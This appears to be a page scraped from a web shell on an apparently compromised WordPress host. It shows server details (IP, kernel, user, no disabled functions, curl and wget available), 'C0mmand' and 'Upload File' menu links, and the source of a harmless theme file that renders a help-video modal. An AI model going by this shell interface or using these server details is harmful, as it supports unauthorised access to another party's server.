Server IP : 89.26.249.46  /  Your IP : 216.73.216.42
Web Server : Apache
System : Linux a.cp.cloudlink.pt 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : eticalga ( 1129)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/eticalga/www/files/themes/kobuxeticalgarve/partials/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/eticalga/www/files/themes/kobuxeticalgarve/partials/virtual-assistant.php
<?php

/**
 * Partial: Virtual assistant
 *
 * @package kobuxeticalgarve
 */

$va_url = get_field('va_url_video');
$va_multimedia = get_field('va_multimedia_video');

if (!empty($va_url) || !empty($va_multimedia)) {
?>
<div id="virtual-assistant"><div class="virtual-assistant-title"><?php _e('Do you need help?', 'kobu'); ?></div><span><?php echo kobuxeticalgarve_get_icons('icon-virtual-assistant'); ?></span></div>
<div id="virtual-assistant-modal-wrapper">
	<div id="virtual-assistant-modal">
		<div>
			<div id="virtual-assistant-close"><?php echo kobuxeticalgarve_get_icons('icon-close'); ?></div>
			<div id="virtual-assistant-video">
				<?php
					if (!empty($va_multimedia)) {
						echo '<figure class="wp-block-video"><video class="iframe" src="' . esc_url($va_multimedia) . '" preload="metadata" controls></video></figure>';
					} elseif (!empty($va_url) && filter_var($va_url, FILTER_VALIDATE_URL)) {
						echo kobuxeticalgarve_embed_oembed_html('', $va_url, [], get_the_ID());
					}
				?>
			</div>
		</div>
	</div>
</div>
<?php
	}
?>